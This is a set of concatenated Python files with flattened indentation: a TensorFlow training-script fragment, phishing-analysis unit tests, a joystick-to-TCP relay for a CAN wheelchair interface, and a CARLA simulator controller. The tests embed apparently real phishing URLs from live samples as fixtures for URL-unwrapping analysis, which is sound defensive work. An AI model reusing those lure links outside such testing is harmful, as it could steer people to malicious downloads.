logging.info("Model inputs: " + str(new_model.inputs) + "; Model outputs: " + str(new_model.output) + "; Loss: " + str(new_model.loss) + "; optimizer: " + str(new_model.optimizer))
init_op = tf.initialize_all_variables()
#with tf.Session() as sess:
# sess.run(tf.global_variables_initializer())
dnn = tf.keras.estimator.model_to_estimator(keras_model=new_model, config=run_config)
tf.estimator.train_and_evaluate(dnn, train_spec, eval_spec)
#tf.estimator.train_and_evaluate(dnn, train_spec, eval_spec)
if shifu_context['is_chief']:
export_dir = shifu_context["export_dir"]
dnn.export_savedmodel(export_dir, serving_input_receiver_fn)
export_generic_config(export_dir=export_dir)
def load_data(data_file):
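# Read the gzipped, DELIMITER-separated input files and split rows into training and
# validation sets by VALID_TRAINING_DATA_RATIO, collecting targets and per-row sample weights.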
data_file_list = data_file.split(",")
global feature_column_nums
logging.info("input data %s" % data_file_list)
logging.info("SELECTED_COLUMN_NUMS" + str(feature_column_nums))
train_data = []
train_target = []
valid_data = []
valid_target = []
training_data_sample_weight = []
valid_data_sample_weight = []
train_pos_cnt = 0
train_neg_cnt = 0
valid_pos_cnt = 0
valid_neg_cnt = 0
file_count = 1
line_count = 0
for currentFile in data_file_list:
logging.info(
"Now loading " + currentFile + " Progress: " + str(file_count) + "/" + str(len(data_file_list)) + ".")
file_count += 1
with gfile.Open(currentFile, 'rb') as f:
gf = gzip.GzipFile(fileobj=StringIO(f.read()))
while True:
line = gf.readline()
if len(line) == 0:
break
line_count += 1
if line_count % 10000 == 0:
logging.info("Total loading lines: " + str(line_count))
columns = line.split(DELIMITER)
if feature_column_nums is None:
feature_column_nums = range(0, len(columns))
feature_column_nums.remove(target_column_num)
if sample_weight_column_num >= 0:
feature_column_nums.remove(sample_weight_column_num)
if random.random() >= VALID_TRAINING_DATA_RATIO:
# Append training data
train_target.append([float(columns[target_column_num])])
if columns[target_column_num] == "1":
train_pos_cnt += 1
else:
train_neg_cnt += 1
single_train_data = []
for feature_column_num in feature_column_nums:
try:
single_train_data.append(float(columns[feature_column_num].strip('\n')))
except:
logging.info("Could not convert " + str(columns[feature_column_num].strip('\n') + " to float"))
logging.info("feature_column_num: " + str(feature_column_num))
train_data.append(single_train_data)
if sample_weight_column_num >= 0 and sample_weight_column_num < len(columns):
weight = float(columns[sample_weight_column_num].strip('\n'))
if weight < 0.0:
logging.info("Warning: weight is below 0. example:" + line)
weight = 1.0
training_data_sample_weight.append([weight])
else:
training_data_sample_weight.append([1.0])
else:
# Append validation data
valid_target.append([float(columns[target_column_num])])
if columns[target_column_num] == "1":
valid_pos_cnt += 1
else:
valid_neg_cnt += 1
single_valid_data = []
for feature_column_num in feature_column_nums:
try:
single_valid_data.append(float(columns[feature_column_num].strip('\n')))
except:
logging.info("Could not convert " + str(columns[feature_column_num].strip('\n') + " to float"))
logging.info("feature_column_num: " + str(feature_column_num))
valid_data.append(single_valid_data)
if sample_weight_column_num >= 0 and sample_weight_column_num < len(columns):
weight = float(columns[sample_weight_column_num].strip('\n'))
if weight < 0.0:
logging.info("Warning: weight is below 0. example:" + line)
weight = 1.0
valid_data_sample_weight.append([weight])
else:
valid_data_sample_weight.append([1.0])
logging.info("Total data count: " + str(line_count) + ".")
logging.info("Train pos count: " + str(train_pos_cnt) + ", neg count: " + str(train_neg_cnt) + ".")
logging.info("Valid pos count: " + str(valid_pos_cnt) + ", neg count: " + str(valid_neg_cnt) + ".")
return {"train_data": train_data, "train_target": train_target,
"valid_data": valid_data, "valid_target": valid_target,
"train_data_sample_weight": training_data_sample_weight,
"valid_data_sample_weight": valid_data_sample_weight,
"feature_count": len(feature_column_nums)}
def simple_save(session, export_dir, inputs, outputs, legacy_init_op=None):
if tf.gfile.Exists(export_dir):
tf.gfile.DeleteRecursively(export_dir)
signature_def_map = {
signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY:
signature_def_utils.predict_signature_def(inputs, outputs)
}
b = builder.SavedModelBuilder(export_dir)
b.add_meta_graph_and_variables(
session,
tags=[tag_constants.SERVING],
signature_def_map=signature_def_map,
assets_collection=ops.get_collection(ops.GraphKeys.ASSET_FILEPATHS),
legacy_init_op=legacy_init_op,
clear_devices=True)
b.save()
export_generic_config(export_dir=export_dir)
def serving_input_receiver_fn():
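# Serving signature: placeholders for the feature matrix and per-row sample weights,
# passed through unchanged as both receiver tensors and features.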
global FEATURE_COUNT
inputs = {
'input_feature': tf.placeholder(tf.float32, [None, FEATURE_COUNT], name='shifu_input_0'),
'sample_weight': tf.placeholder(tf.float32, [None, 1], name='shifu_input_wgt_0')
}
return tf.estimator.export.ServingInputReceiver(inputs, inputs)
def export_generic_config(export_dir):
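# The JSON below is assembled by string concatenation; an equivalent (hypothetical)
# alternative would be json.dumps on a plain dict, e.g.:
#   config_json_str = json.dumps({
#       "inputnames": ["shifu_input_0"],
#       "properties": {"algorithm": "tensorflow", "tags": ["serve"],
#                      "outputnames": "shifu_output_0", "normtype": "ZSCALE"}}, indent=4)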
config_json_str = ""
config_json_str += "{\n"
config_json_str += " \"inputnames\": [\n"
config_json_str += " \"shifu_input_0\"\n"
config_json_str += " ],\n"
config_json_str += " \"properties\": {\n"
config_json_str += " \"algorithm\": \"tensorflow\",\n"
config_json_str += " \"tags\": [\"serve\"],\n"
config_json_str += " \"outputnames\": \"shifu_output_0\",\n"
config_json_str += " \"normtype\": \"ZSCALE\"\n"
config_json_str += " }\n"
config_json_str += "}"
f = tf.gfile.GFile(export_dir + "/GenericModelConfig.json", mode="w+")
f.write(config_json_str)
def start_tensorboard(checkpoint_dir):
tf.flags.FLAGS.logdir = checkpoint_dir
if 'TB_PORT' in os.environ:
tf.flags.FLAGS.port = os.environ['TB_PORT']
# NOTE: requires re-enabling the commented-out `from threading import Thread` and
# `import tensorboard.main as tb_main` imports above.
tb_thread = Thread(target=tb_main.run_main)
tb_thread.daemon = True
logging.info("Starting TensorBoard with --logdir=" + checkpoint_dir + " in daemon thread...")
tb_thread.start()
if __name__ == '__main__':
tf.app.run()
|
test_url.py
|
# vim: sw=4:ts=4:et
import datetime
import http.server
import logging
import socketserver
import threading
import unittest
import saq, saq.test
from saq.constants import *
from saq.test import *
LOCAL_PORT = 43124
web_server = None
class TestCase(ACEModuleTestCase):
@classmethod
def setUpClass(cls):
global web_server
# create a simple web server listening on localhost
class _customTCPServer(socketserver.TCPServer):
allow_reuse_address = True
web_server = _customTCPServer(('', LOCAL_PORT), http.server.SimpleHTTPRequestHandler)
web_server_thread = threading.Thread(target=web_server.serve_forever)
web_server_thread.daemon = True
web_server_thread.start()
@classmethod
def tearDownClass(cls):
web_server.shutdown()
def setUp(self):
ACEModuleTestCase.setUp(self)
# disable proxy for crawlphish
self.old_proxies = saq.PROXIES
saq.PROXIES = {}
def tearDown(self):
ACEModuleTestCase.tearDown(self)
saq.PROXIES = self.old_proxies
def test_basic_download(self):
from saq.modules.url import CrawlphishAnalysisV2
root = create_root_analysis()
root.initialize_storage()
url = root.add_observable(F_URL, 'http://localhost:{}/test_data/crawlphish.000'.format(LOCAL_PORT))
url.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_crawlphish', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
analysis = url.get_analysis(CrawlphishAnalysisV2)
self.assertEquals(analysis.status_code, 200)
self.assertEquals(analysis.file_name, 'crawlphish.000')
self.assertTrue(analysis.downloaded)
self.assertIsNone(analysis.error_reason)
# there should be a single F_FILE observable
file_observables = analysis.get_observables_by_type(F_FILE)
self.assertEquals(len(file_observables), 1)
file_observable = file_observables[0]
self.assertTrue(file_observable.has_directive(DIRECTIVE_EXTRACT_URLS))
self.assertTrue(file_observable.has_relationship(R_DOWNLOADED_FROM))
def test_download_404(self):
"""We should not extract URLs from data downloaded from URLs that returned a 404."""
from saq.modules.url import CrawlphishAnalysisV2
root = create_root_analysis()
root.initialize_storage()
url = root.add_observable(F_URL, 'http://localhost:{}/test_data/crawlphish.001'.format(LOCAL_PORT))
url.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_crawlphish', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
analysis = url.get_analysis(CrawlphishAnalysisV2)
self.assertEquals(analysis.proxy_results['GLOBAL'].status_code, 404)
if 'tor' in analysis.proxy_results:
self.assertIsNone(analysis.proxy_results['tor'].status_code)
self.assertIsNone(analysis.file_name) # no file should have been downloaded
self.assertFalse(analysis.downloaded)
self.assertIsNotNone(analysis.error_reason)
file_observables = analysis.get_observables_by_type(F_FILE)
self.assertEquals(len(file_observables), 0)
@unittest.skip
@force_alerts
def test_live_browser_basic(self):
"""Basic test of LiveBrowserAnalysis."""
from saq.modules.url import CrawlphishAnalysisV2
from saq.modules.url import LiveBrowserAnalysis
root = create_root_analysis()
root.initialize_storage()
url = root.add_observable(F_URL, 'http://localhost:{}/test_data/live_browser.000.html'.format(LOCAL_PORT))
url.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_crawlphish', 'test_groups')
engine.enable_module('analysis_module_live_browser_analyzer', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
analysis = url.get_analysis(CrawlphishAnalysisV2)
file_observables = analysis.get_observables_by_type(F_FILE)
self.assertEquals(len(file_observables), 1)
file_observable = file_observables[0]
analysis = file_observable.get_analysis(LiveBrowserAnalysis)
file_observables = analysis.get_observables_by_type(F_FILE)
self.assertEquals(len(file_observables), 1)
file_observable = file_observables[0]
self.assertEquals(file_observable.value, 'crawlphish/localhost_0/localhost_000.png')
@force_alerts
def test_live_browser_404(self):
"""We should not download screenshots for URLs that returned a 404 error message."""
from saq.modules.url import CrawlphishAnalysisV2
from saq.modules.url import LiveBrowserAnalysis
root = create_root_analysis()
root.initialize_storage()
# this file does not exist
url = root.add_observable(F_URL, 'http://localhost:{}/test_data/live_browser.dne.html'.format(LOCAL_PORT))
url.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_crawlphish', 'test_groups')
engine.enable_module('analysis_module_live_browser_analyzer', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
analysis = url.get_analysis(CrawlphishAnalysisV2)
file_observables = analysis.get_observables_by_type(F_FILE)
self.assertEquals(len(file_observables), 0)
def test_protected_url_outlook_safelinks(self):
root = create_root_analysis()
root.initialize_storage()
# taken from an actual sample
url = root.add_observable(F_URL, 'https://na01.safelinks.protection.outlook.com/?url=http%3A%2F%2Fwww.getbusinessready.com.au%2FInvoice-Number-49808%2F&data=02%7C01%7Ccyoung%40northernaviationservices.aero%7C8a388036cbf34f90ec5808d5724be7ed%7Cfc01978435d14339945c4161ac91c300%7C0%7C0%7C636540592704791165&sdata=%2FNQGqAp09WTNgnVnpoWIPcYNVAYsJ11ULuSS7cCsS3Q%3D&reserved=0')
url.add_directive(DIRECTIVE_CRAWL) # not actually going to crawl, just testing that it gets copied over
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_protected_url_analyzer', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
from saq.modules.url import ProtectedURLAnalysis, PROTECTION_TYPE_OUTLOOK_SAFELINKS
analysis = url.get_analysis(ProtectedURLAnalysis)
self.assertIsNotNone(analysis)
self.assertEquals(analysis.protection_type, PROTECTION_TYPE_OUTLOOK_SAFELINKS)
self.assertEquals(analysis.extracted_url, 'http://www.getbusinessready.com.au/Invoice-Number-49808/')
extracted_url = analysis.get_observables_by_type(F_URL)
self.assertEquals(len(extracted_url), 1)
extracted_url = extracted_url[0]
self.assertTrue(extracted_url.has_directive(DIRECTIVE_CRAWL))
def test_protected_url_dropbox(self):
root = create_root_analysis()
root.initialize_storage()
# taken from an actual sample
url_with_dl0 = root.add_observable(F_URL, 'https://www.dropbox.com/s/ezdhsvdxf6wrxk6/RFQ-012018-000071984-13-Rev.1.zip?dl=0')
url_with_dl1 = root.add_observable(F_URL, 'https://www.dropbox.com/s/ezdhsvdxf6wrxk6/RFQ-012018-000071984-13-Rev.1.zip?dl=1')
url_without_dl = root.add_observable(F_URL, 'https://www.dropbox.com/s/ezdhsvdxf6wrxk6/RFQ-012018-000071984-13-Rev.1.zip')
url_with_dl0.add_directive(DIRECTIVE_CRAWL) # not actually going to crawl, just testing that it gets copied over
url_with_dl1.add_directive(DIRECTIVE_CRAWL)
url_without_dl.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_protected_url_analyzer', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url_with_dl0 = root.get_observable(url_with_dl0.id)
url_with_dl1 = root.get_observable(url_with_dl1.id)
url_without_dl = root.get_observable(url_without_dl.id)
from saq.modules.url import ProtectedURLAnalysis, PROTECTION_TYPE_DROPBOX
analysis = url_with_dl0.get_analysis(ProtectedURLAnalysis)
self.assertIsNotNone(analysis)
self.assertEquals(analysis.protection_type, PROTECTION_TYPE_DROPBOX)
self.assertEquals(analysis.extracted_url, 'https://www.dropbox.com/s/ezdhsvdxf6wrxk6/RFQ-012018-000071984-13-Rev.1.zip?dl=1')
extracted_url = analysis.get_observables_by_type(F_URL)
self.assertEquals(len(extracted_url), 1)
extracted_url = extracted_url[0]
self.assertTrue(extracted_url.has_directive(DIRECTIVE_CRAWL))
analysis = url_with_dl1.get_analysis(ProtectedURLAnalysis)
self.assertFalse(analysis)
analysis = url_without_dl.get_analysis(ProtectedURLAnalysis)
self.assertIsNotNone(analysis)
self.assertEquals(analysis.protection_type, PROTECTION_TYPE_DROPBOX)
self.assertEquals(analysis.extracted_url, 'https://www.dropbox.com/s/ezdhsvdxf6wrxk6/RFQ-012018-000071984-13-Rev.1.zip?dl=1')
extracted_url = analysis.get_observables_by_type(F_URL)
self.assertEquals(len(extracted_url), 1)
extracted_url = extracted_url[0]
self.assertTrue(extracted_url.has_directive(DIRECTIVE_CRAWL))
def test_protected_url_google_drive(self):
root = create_root_analysis()
root.initialize_storage()
# taken from an actual sample
url = root.add_observable(F_URL, 'https://drive.google.com/file/d/1ls_eBCsmf3VG_e4dgQiSh_5VUM10b9s2/view')
url.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_protected_url_analyzer', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
from saq.modules.url import ProtectedURLAnalysis, PROTECTION_TYPE_GOOGLE_DRIVE
analysis = url.get_analysis(ProtectedURLAnalysis)
self.assertIsNotNone(analysis)
self.assertEquals(analysis.protection_type, PROTECTION_TYPE_GOOGLE_DRIVE)
self.assertEquals(analysis.extracted_url, 'https://drive.google.com/uc?authuser=0&id=1ls_eBCsmf3VG_e4dgQiSh_5VUM10b9s2&export=download')
extracted_url = analysis.get_observables_by_type(F_URL)
self.assertEquals(len(extracted_url), 1)
extracted_url = extracted_url[0]
self.assertTrue(extracted_url.has_directive(DIRECTIVE_CRAWL))
def test_protected_url_sharepoint(self):
root = create_root_analysis()
root.initialize_storage()
# taken from an actual sample
url = root.add_observable(F_URL, 'https://lahia-my.sharepoint.com/:b:/g/personal/secure_onedrivemsw_bid/EVdjoBiqZTxMnjAcDW6yR4gBqJ59ALkT1C2I3L0yb_n0uQ?e=naeXYD')
url.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_protected_url_analyzer', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
from saq.modules.url import ProtectedURLAnalysis, PROTECTION_TYPE_SHAREPOINT
analysis = url.get_analysis(ProtectedURLAnalysis)
self.assertIsNotNone(analysis)
self.assertEquals(analysis.protection_type, PROTECTION_TYPE_SHAREPOINT)
from urllib.parse import urlparse, parse_qs
parsed_url = urlparse(analysis.extracted_url)
self.assertEquals(parsed_url.path, '/personal/secure_onedrivemsw_bid/_layouts/15/download.aspx')
parsed_qs = parse_qs(parsed_url.query)
self.assertEquals(parsed_qs['e'][0], 'naeXYD')
self.assertEquals(parsed_qs['share'][0], 'EVdjoBiqZTxMnjAcDW6yR4gBqJ59ALkT1C2I3L0yb_n0uQ')
extracted_url = analysis.get_observables_by_type(F_URL)
self.assertEquals(len(extracted_url), 1)
extracted_url = extracted_url[0]
self.assertTrue(extracted_url.has_directive(DIRECTIVE_CRAWL))
|
JoyServerLeftStick.py
|
#!/python3
# joystick based on: https://www.kernel.org/doc/Documentation/input/joystick-api.txt
import socket, sys, os, struct, array, threading
from time import *
from fcntl import ioctl
from can2RNET import *
debug = False
#host = '192.168.43.47' # FOR COOLPAD hotspot
#host = '192.168.43.83' # FOR LG hotspot
#host = '192.168.43.46' # FOR ALCATEL hotspot
host = '192.168.100.2' #
#host = 'localhost'
port = 13337
deadrange = 16
maxjoyposition = 100
if len(sys.argv) != 2:
print('Using hardcoded IP address!')
#sys.exit(0)
elif len(sys.argv) == 2:
host = sys.argv[1]
class X360:
axis_map = []
button_map = []
xthreshold = deadrange * 0x10000 / 128
ythreshold = deadrange * 0x10000 / 128
joyx = 0
joyy = 0
exbuf = ""
outstr = "0000"
# We'll store the states here.
axis_states = {}
button_states = {}
# These constants were borrowed from linux/input.h
axis_names = {
0x00 : 'x',
0x01 : 'y',
0x02 : 'z',
0x03 : 'rx',
0x04 : 'ry',
0x05 : 'rz',
0x06 : 'throttle',
0x07 : 'rudder',
0x08 : 'wheel',
0x09 : 'gas',
0x0a : 'brake',
0x10 : 'hat0x',
0x11 : 'hat0y',
0x12 : 'hat1x',
0x13 : 'hat1y',
0x14 : 'hat2x',
0x15 : 'hat2y',
0x16 : 'hat3x',
0x17 : 'hat3y',
0x18 : 'pressure',
0x19 : 'distance',
0x1a : 'tilt_x',
0x1b : 'tilt_y',
0x1c : 'tool_width',
0x20 : 'volume',
0x28 : 'misc',
}
button_names = {
0x120 : 'trigger',
0x121 : 'thumb',
0x122 : 'thumb2',
0x123 : 'top',
0x124 : 'top2',
0x125 : 'pinkie',
0x126 : 'base',
0x127 : 'base2',
0x128 : 'base3',
0x129 : 'base4',
0x12a : 'base5',
0x12b : 'base6',
0x12f : 'dead',
0x130 : 'a',
0x131 : 'b',
0x132 : 'c',
0x133 : 'x',
0x134 : 'y',
0x135 : 'z',
0x136 : 'tl',
0x137 : 'tr',
0x138 : 'tl2',
0x139 : 'tr2',
0x13a : 'select',
0x13b : 'start',
0x13c : 'mode',
0x13d : 'thumbl',
0x13e : 'thumbr',
0x220 : 'dpad_up',
0x221 : 'dpad_down',
0x222 : 'dpad_left',
0x223 : 'dpad_right',
# XBox 360 controller uses these codes.
0x2c0 : 'dpad_left',
0x2c1 : 'dpad_right',
0x2c2 : 'dpad_up',
0x2c3 : 'dpad_down',
}
def init_joystick(self):
if debug:
# Iterate over the joystick devices.
print('Available devices:')
for fn in os.listdir('/dev/input'):
if fn.startswith('js'):
print(' /dev/input/%s' % (fn))
# Open the joystick device.
try:
fn = '/dev/input/js0'
if debug:
print('Opening %s...' % fn)
jsdev = open(fn, 'rb', buffering=0)
except IOError:
print ('No joystick at ' + fn)
return ('')
#jsdev = os.open(fn, 'rb', os.O_RDONLY|os.O_NONBLOCK)
# Get the device name.
#buf = bytearray(63)
buf = bytearray([0] * 64)
ioctl(jsdev, 0x80006a13 + (0x10000 * len(buf)), buf) # JSIOCGNAME(len)
js_name = buf
if debug:
print('Device name: %s' % js_name)
# Get number of axes and buttons.
buf = array.array('B', [0] )
ioctl(jsdev, 0x80016a11, buf) # JSIOCGAXES
num_axes = buf[0]
buf = array.array('B', [0] )
ioctl(jsdev, 0x80016a12, buf) # JSIOCGBUTTONS
num_buttons = buf[0]
# Get the axis map.
buf = array.array('B', [0] * 0x40)
ioctl(jsdev, 0x80406a32, buf) # JSIOCGAXMAP
for axis in buf[:num_axes]:
axis_name = self.axis_names.get(axis, 'unknown(0x%02x)' % axis)
self.axis_map.append(axis_name)
self.axis_states[axis_name] = 0.0
# Get the button map.
buf = array.array('H', [0] * 200)
ioctl(jsdev, 0x80406a34, buf) # JSIOCGBTNMAP
for btn in buf[:num_buttons]:
btn_name = self.button_names.get(btn, 'unknown(0x%03x)' % btn)
self.button_map.append(btn_name)
self.button_states[btn_name] = 0
if debug:
print ('%d axes found: %s' % (num_axes, ', '.join(self.axis_map)))
print ('%d buttons found: %s' % (num_buttons, ', '.join(self.button_map)))
return (jsdev)
def dec2hex(self, dec,hexlen): #convert dec to hex with leading 0s and no '0x'
h=hex(int(dec))[2:]
l=len(h)
if h[l-1]=="L":
l-=1 #strip the 'L' that python int sticks on
if h[l-2]=="x":
h= '0'+hex(int(dec))[1:]
return ('0'*hexlen+h)[l:l+hexlen]
def joyread_thread(self, jsdev):
global joyx
global joyy
while True:
evbuf = jsdev.read(8)
jtime, jvalue, jtype, jnumber = struct.unpack('IhBB', evbuf)
if jtype & 0x02:
axis = self.axis_map[jnumber]
if (axis == 'x'):
if abs(jvalue) > self.xthreshold:
joyx = 0x100 + int(jvalue * maxjoyposition / 128) >> 8 &0xFF
else:
joyx = 0
elif (axis == 'y'):
if abs(jvalue) > self.ythreshold:
joyy = 0x100 - int(jvalue * maxjoyposition / 128) >> 8 &0xFF
else:
joyy = 0
def socketjoyclientthread(self,conn):
global joyx
global joyy
conn.send('This code is not correct\n'.encode())
def socketjoyserverthread(self,ipsocket,jsdev):
global joyx
global joyy
speed_range = 0
global joyevent
joypacketinterval = .01
joyipsocketthread = threading.Thread(target=x360.joyipsocketthread,args=(ipsocket,joypacketinterval,),daemon = True)
joyipsocketthread.start()
running = True
        while running and joyipsocketthread.is_alive():
try:
ev = jsdev.read(8)
if len(ev) != 8:
break;
jtime, jvalue, jtype, jnumber = struct.unpack('IhBB', ev)
if jtype & 0x02:
axis = self.axis_map[jnumber]
if (axis == 'x'):
if abs(jvalue) > self.xthreshold:
#joyx = 0x100 + int(jvalue * 100 / 128) >> 8 &0xFF
joyx = jvalue
else:
joyx = 0
elif (axis == 'y'):
if abs(jvalue) > self.ythreshold:
#joyy = 0x100 - int(jvalue * 100 / 128) >> 8 &0xFF
joyy = jvalue
else:
joyy = 0
else:
print (axis)
elif jtype & 0x01:
if jvalue == 1 and jnumber == 0:
if speed_range>0:
speed_range -= 25
joyevent = 's:'+dec2hex(speed_range,2)
print("SpeedRange: " + str(speed_range))
elif jvalue == 1 and jnumber == 1:
if speed_range<100:
speed_range += 25
joyevent = 's:'+dec2hex(speed_range,2)
print("SpeedRange: " + str(speed_range))
elif jvalue == 0 and jnumber == 2:
joyevent = 'b:h0'
elif jvalue == 1 and jnumber == 2:
joyevent = 'b:h1'
else:
print("VAL:"+str(jvalue)+"NUM:"+str(jnumber))
            except (IOError, OSError):
print("Joystick read error")
joyx = 0
joyy = 0
running = False
def joyipsocketthread(self,ipsocket,interval,):
        # joyevent is a module-level one-shot event string set by socketjoyserverthread and cleared after each send
global joyevent
joyevent = ' :00'
nexttime = time()+interval
filtercutoff = 2
filtered_joyx=joyx
filtered_joyy=joyy
running = True
while running:
nexttime += interval
try:
filtered_joyx += joyx/filtercutoff - filtered_joyx/filtercutoff
filtered_joyy += joyy/filtercutoff - filtered_joyy/filtercutoff
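                # First-order IIR low-pass: filtered = filtered*(1 - 1/filtercutoff) + joy/filtercutoff.
                # With filtercutoff = 2 the new sample and the previous estimate are weighted 50/50,
                # smoothing single-sample joystick jitter before the value is packed and sent below.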
joyxout = 0x100 + int(filtered_joyx * maxjoyposition / 128) >> 8 &0xFF
joyyout = 0x100 - int(filtered_joyy * maxjoyposition / 128) >> 8 &0xFF
if joyxout == 1:
joyxout = 0
if joyyout == 1:
joyyout = 0
ipsocket.send(('x:'+dec2hex(joyxout,2)+'y:'+dec2hex(joyyout,2)+joyevent+'\r').encode())
joyevent = ' :00' #one time only
except IOError as e:
if '[Errno 32]' in str(e): #Errno 32 = Broken pipe ie. client dropped
print('Client dropped connection')
running = False
if '[Errno 104]' in str(e): #Errno 104 = connection reset
print('Destination port reset by client.')
running = False
return(e)
if nexttime > time():
sleep(nexttime - time())
else:
nexttime = time()+interval
def dec2hex(dec,hexlen): #convert dec to hex with leading 0s and no '0x'
#this function is ugly and could be improved
h=hex(int(dec))[2:]
l=len(h)
if h[l-1]=="L":
l-=1 #strip the 'L' that python int sticks on
if h[l-2]=="x":
h= '0'+hex(int(dec))[1:]
return ('0'*hexlen+h)[l:l+hexlen]
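# For the non-negative values used in this script (joy positions 0-255, speed_range 0-100)
# a simpler equivalent could use Python's format() mini-language; sketch only, not wired in:
#
#   def dec2hex_simple(dec, hexlen):
#       """Return `dec` as lowercase hex, zero-padded/truncated to `hexlen` digits."""
#       return format(int(dec) & ((1 << (4 * hexlen)) - 1), '0{}x'.format(hexlen))
#
#   dec2hex_simple(100, 2)  # -> '64', same as dec2hex(100, 2)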
if __name__ == "__main__":
main_running = True
while main_running:
#open client ip port listener
if host=='':
try:
ipsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
except socket.error:
print ("Failed to create ipsocket")
sys.exit()
print ("ip client socket created")
ipsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
ipsocket.bind((host, port))
except socket.gaierror:
print ("Hostname could not be resolved.")
sys.exit()
print ("Socket bound to port " + str(port))
#or open server ip port
else:
try:
ipsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
except socket.error:
print ("Failed to create ipsocket")
sys.exit()
print ("Joystick over IP server socket created")
ipsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print ("Attempting connection to "+host+':'+str(port))
reconnect = True
while reconnect:
try:
ipsocket.connect((host, port))
reconnect = False
except socket.gaierror:
print ("Hostname could not be resolved.")
sys.exit()
except IOError as e:
                    if '[Errno 111]' in str(e):  # Errno 111 = connection refused
print("Connection refused... trying again")
reconnect = True
print ("Socket connected to:" + host + ':' + str(port))
#init /dev joystick
x360 = X360()
jsdev = x360.init_joystick()
global joyx
global joyy
global joyevent
joyx = 0
joyy = 0
if host=='':
ipsocket.listen(10)
print ('IPsocket now listening')
while threading.active_count() > 0:
conn, addr = ipsocket.accept()
print ('Connected to ' + addr[0] +':' +str(addr[1]))
socket_to_joy_thread = threading.Thread(target=x360.socketjoyclientthread,args=(conn,),daemon = True)
socket_to_joy_thread.start()
else:
if jsdev != '':
joy_to_socket_thread = threading.Thread(target=x360.socketjoyserverthread,args=(ipsocket,jsdev,),daemon = True)
joy_to_socket_thread.start()
                while threading.active_count() > 0 and joy_to_socket_thread.is_alive():
sleep(0.2)
ipsocket.close()
print("Close ipsocket")
|
DataController.py
|
# Use this import to avoid cyclic imports with type checking (requires Python >= 3.7)
from __future__ import annotations
# Imports
import sys
import time
import math
import threading
import atexit
import logging
import carla
from bridge.carla.sensor.IMUSensor import IMUSensor
from bridge.carla.sensor.GNSSSensor import GNSSSensor
from bridge.carla.sensor.CameraSensor import CameraSensor
from bridge.carla.sensor.TachometerSensor import TachometerSensor
# Module-level logger used by init_carla() and the simulation loop.
logger = logging.getLogger(__name__)
class DataController:
"""
DataController class
"""
def __init__(self, carla_ip="localhost", carla_port=2000):
"""Constructor"""
# Init class attributes
self.carla_ip = carla_ip
self.carla_port = carla_port
self.carla_client = None
self.carla_world = None
self.world_step = 0.1 # 100ms
self.carla_blueprint_library = None
self.carla_vehicle = None
self.spawn_point = None
self.vehicle_control = carla.VehicleControl()
self.external_control = True
self.sensors = []
self.can_encoder = None
self.ethernet_encoder = None
self.simulation_thread = None
self.running = False
self.real_time = False
# Init carla simulation environment
self.init_carla()
# Create simulation thread
self.simulation_thread = threading.Thread(target=self._simulation_loop, daemon=True)
# Ensure destructor is called when the object goes out of scope
atexit.register(self.__del__)
def __del__(self):
"""Destructor"""
# Leave synchronous mode
settings = self.carla_world.get_settings()
settings.synchronous_mode = False
self.carla_world.apply_settings(settings)
# Delete carla objects
self.carla_vehicle.destroy()
def init_carla(self):
"""Init carla client and setup vehicle"""
# Init carla client for interaction with simulator
self.carla_client = carla.Client(self.carla_ip, self.carla_port)
self.carla_client.set_timeout(10.0) # 10s
# Get world instance
try:
self.carla_world = self.carla_client.get_world()
print("carla_world:", self.carla_world)
        except Exception:
logger.critical(
"Unable to connect to carla world, timeout reached! Please ensure that the carla framework is running on the specified ip and port.")
sys.exit(10)
# Set fixed simulation time step
settings = self.carla_world.get_settings()
# Set fixed simulation step
settings.fixed_delta_seconds = self.world_step
        # Allow physics substepping (useful at low update rates to maintain a realistic physics simulation)
settings.substepping = True
settings.max_substep_delta_time = 0.01 # Recommended value <= 0.01
# (fulfill: fixed_delta_seconds <= max_substep_delta_time * max_substeps)
settings.max_substeps = min(int(math.ceil(self.world_step / 0.01)), 16)
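        # Worked example: with world_step = 0.1 s this yields max_substeps = 10, so one
        # 100 ms world tick is split into up to ten 10 ms physics substeps, satisfying
        # fixed_delta_seconds <= max_substep_delta_time * max_substeps as noted above.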
# Enable synchronous mode
settings.synchronous_mode = True
self.carla_world.apply_settings(settings)
# Get list of available blueprints
self.carla_blueprint_library = self.carla_world.get_blueprint_library()
# Setup vehicle
vehicle_bp = self.carla_blueprint_library.find('vehicle.audi.etron')
# vehicle_bp.set_attribute('color', '60, 140, 30') # RGB color string
vehicle_bp.set_attribute('color', '255, 0, 0') # RGB color string
# Spawn the vehicle
self.spawn_point = self.carla_world.get_map().get_spawn_points()[
54] # Spawn point
self.carla_vehicle = self.carla_world.spawn_actor(
vehicle_bp, self.spawn_point)
